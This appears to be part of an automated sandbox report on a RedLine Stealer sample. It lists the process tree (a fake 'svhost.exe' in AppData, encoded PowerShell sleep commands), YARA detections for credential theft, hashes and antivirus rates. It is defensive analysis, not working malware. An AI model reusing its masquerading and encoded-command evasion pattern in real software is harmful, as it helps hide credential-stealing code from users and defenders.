                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:2
                                                  Start time:08:09:16
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Roaming\svhost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\svhost.exe"
                                                  Imagebase:0xd30000
                                                  File size:1262592 bytes
                                                  MD5 hash:D3713110654DC546BD5EDC306A6E7EFD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: HKTL_NET_NAME_DotNetInject, Description: Detects .NET red/black-team tools via name, Source: 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.464775648.0000000005960000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:3
                                                  Start time:08:09:32
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                  Imagebase:0xa0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Target ID:4
                                                  Start time:08:09:33
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c72c0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:7
                                                  Start time:08:10:00
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Roaming\svhost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\svhost.exe
                                                  Imagebase:0xe00000
                                                  File size:1262592 bytes
                                                  MD5 hash:D3713110654DC546BD5EDC306A6E7EFD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low

                                                  General

                                                  Target ID:8
                                                  Start time:08:10:00
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c72c0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:9
                                                  Start time:08:10:10
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
                                                  Imagebase:0xff0000
                                                  File size:1262592 bytes
                                                  MD5 hash:D3713110654DC546BD5EDC306A6E7EFD
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:10
                                                  Start time:08:10:19
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
                                                  Imagebase:0x90000
                                                  File size:1262592 bytes
                                                  MD5 hash:D3713110654DC546BD5EDC306A6E7EFD
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:11
                                                  Start time:08:10:52
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                  Imagebase:0xa0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Target ID:12
                                                  Start time:08:10:52
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c72c0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:16
                                                  Start time:08:11:11
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                  Imagebase:0xa0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Target ID:17
                                                  Start time:08:11:11
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c72c0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Disassembly

                                                  No disassembly